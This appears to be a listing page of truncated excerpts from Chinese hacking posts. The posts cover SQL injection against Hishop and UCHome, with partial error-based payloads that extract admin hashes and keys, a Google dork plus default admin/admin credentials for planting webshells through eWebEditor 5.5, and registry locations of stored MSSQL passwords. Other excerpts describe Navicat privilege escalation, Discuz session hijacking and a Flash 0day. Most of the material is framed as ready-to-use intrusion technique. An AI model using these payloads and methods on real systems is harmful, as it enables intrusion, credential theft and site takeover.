Hishop5.4和5.4.1 漏洞利用
hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。 前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下, 这个注入点再结合iis6就能拿shell了。 前几天看到了toby57大牛dz1.5的exp, 看的我荡漾了,所以下午花了点时间,看了下PHP,学着写了个php的exp。 大牛别笑哈。。 选这种类似的URL 拿she...
mysql暴错注入的科普 1
抽uchome两个老的SQL注入漏洞举例,漏洞很久以前就被人公布过了,两个SQL注入都在个人资料更新的流程里: 注册变量的代码KEY的内容直接进入了$inserts数组 foreach ($_POST['friend'] as $key => $value) { $value = intval($value); $inserts[] = "('base','$key','$sp...
mysql暴错注入的科普 2
通过前面SQL错误信息获得了表前缀,那么直接就可以爆用户名为admin的hash 向cp.php?ac=profile&op=info POST提交参数: profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(password) FROM ...
mysql暴错注入的科普 3
跨库爆出uckey,跨库到ucenter进行查询,这里我就不详叙了,都截图吧。 爆出数据库的个数 profilesubmit=1&formhash=232d1c54&info[a',(select 1 from(select count(*),concat((SELECT concat(substring(count(*),1,64)) F...
云起企业建站系统通杀oday
话说无聊去代码网站下套程序分析分析 可到了这个云起企业建站系统 下载数挺多的 于是乎看了起来 首先看到了它的后台login.asp文件。。一看 边觉得蛋疼。。。 if request.Form("submit")<>"" then if request.Form("userid")="" or request.Form("password")="" then response.Writ...
Flash 0day Exploit Analysis
数天前网络上爆出来利用最新“Flash媒体漏洞”挂马的攻击网页,这个漏洞影响Adobe Flash Player 10.3.183.5以下的版本,要知道在本周三之前10.3.183.5是flash最高版本,即使现在已经发布更新,但并不是每个机器都安装了更新,因为在我的自己上Adobe Flash 就没有提示安装更新。 这个漏洞是通过Flash的媒体播放功能播放一个恶意视频文件触发的。至少我知道会影...
eWebEditor5.5 漏洞
作者:脚本小子 Google搜索:inurl:xxhs.asp?classid= 漏洞eWebEditor5.5 拿webshell方法 直接进后台eWebEditor/admin/login.asp 默认账号密码 admin admin 登陆后台点击“样式管理” 在popup样式管理 修改 路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|c...
phpMyRealty
标题: [phpMyRealty > best egyption hacker >>> H4T$A ||========================================================================================= 本问题影响该程序所有版本 Exploit : https://www.webshell.cc/search.php?s...
navicat提权及星外主机注册表mssql密码位置
星外主机注册表mssql密码位置 1、HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 2、HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\ navicat是一个比较流行的MySQL管理工具,在很多服务器上都可以找到,有两个方法提权: 1、从日志文件里找密码,navic...
discuz sessoin hijack tips 续
前面发的是UCHOME,为免有装B的嫌疑,干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL,谢谢. DISCUZ X系列论坛的session和UCHOME不同,生成session使用的authkey不是程序的UCKEY,看看DZ的代码就了解啦: 1.浏览器类型和$_config['security']['authkey']加起来生成了一个全...